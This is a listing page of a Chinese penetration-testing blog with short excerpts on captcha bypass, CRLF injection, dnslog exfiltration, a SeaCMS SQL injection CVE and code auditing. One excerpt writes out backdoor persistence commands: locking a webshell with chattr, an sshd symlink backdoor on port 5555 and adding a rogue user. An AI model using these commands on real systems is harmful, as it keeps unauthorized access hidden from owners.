最新发布第16页
burp suite 利用宏规则绕过滑动验证码-XSS博客
SN 某二级站点登录处CRLF注入,导致全站沦陷XSS(及绕过限制实现URL跳转)-XSS博客
日常技巧 - 命令无回显实战 Tips-XSS博客

日常技巧 – 命令无回显实战 Tips

dnslog 获取完整请求 大多数 dnslog 平台外带数据会发现不能获取全部内容 https://log.xn--9tr.com/ 改用以下地址,但是中文会出现乱码 https://www.log.d48e48337471993e.com/ 或者使用 burp ...
xss-admin的头像-XSS博客xss-admin11个月前
023412
记一次使用Burpsuite下的插件Turbo intruder进行实战-XSS博客

记一次使用Burpsuite下的插件Turbo intruder进行实战

相信很多师傅在进行渗透测试或者漏洞挖掘的时候都会用到burpsuite这款神器,但是不知道师傅们用过burpsuite里面一款叫turbo intruder的插件么 不管这些,今天看了这篇文章的师傅我相信也会对这...
xss-admin的头像-XSS博客xss-admin11个月前
011912
权限维持 - 后门隐藏技术-XSS博客

权限维持 – 后门隐藏技术

文件上锁 chattr +i webshell.php lsattr webshell.php chattr -i webshell.php ssh 软链接 ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555; useradd test -p test 不死马 访问该 php 文...
xss-admin的头像-XSS博客xss-admin11个月前
015312
PHP Eval() 的危险-XSS博客

PHP Eval() 的危险

PHP Eval() 的危险
日常技巧 - 抓取 jar 包 payload 数据-XSS博客

日常技巧 – 抓取 jar 包 payload 数据

fiddler 设置 Connections 端口为 8888 代理设置为 burp 监听的 127.0.0.1:8080 java -DproxySet=true -DproxyHost=localhost -DproxyPort=8888 -jar yonyouNC_unserialize_tool.jar
xss-admin的头像-XSS博客xss-admin11个月前
015211
【成功复现】SeaCMS海洋影视管理系统SQL注入漏洞(CVE-2024-29275)-XSS博客

【成功复现】SeaCMS海洋影视管理系统SQL注入漏洞(CVE-2024-29275)

0x01漏洞介绍 SeaCMS是一套使用PHP编写的免费、开源的网站内容管理系统。该系统主要被设计用来管理视频点播资源。 SeaCMS 12.9版本存在安全漏洞,该漏洞源于存在SQL注入漏洞,允许未经身份验证...
xss-admin的头像-XSS博客xss-admin11个月前
039311
渗透测试 - 如何高效率挖掘漏洞-XSS博客

渗透测试 – 如何高效率挖掘漏洞

前言 1、做渗透由始至终,忌讳穿插其他项目进行 2、按顺序细心测试每一个功能点,保证漏洞无遗漏 3、山穷水复疑无路,柳暗花明又一村,一个点利用不到,可以灵活变通尝试其他方向 漏扫工具 AWVS...
xss-admin的头像-XSS博客xss-admin11个月前
014711
五十一.代码审计-PHP 框架 MVC 类上传断点调试挖掘-XSS博客

五十一.代码审计-PHP 框架 MVC 类上传断点调试挖掘

1. 文件上传漏洞挖掘: (1) 关键字搜索(函数、键字、全局变量等):比如 $_FILES,move_uploades_file 等 (2) 应该功能抓包:寻找任何可能存在上传的应用功能点,比如前台会员中心,后台新闻添...
xss-admin的头像-XSS博客xss-admin11个月前
012611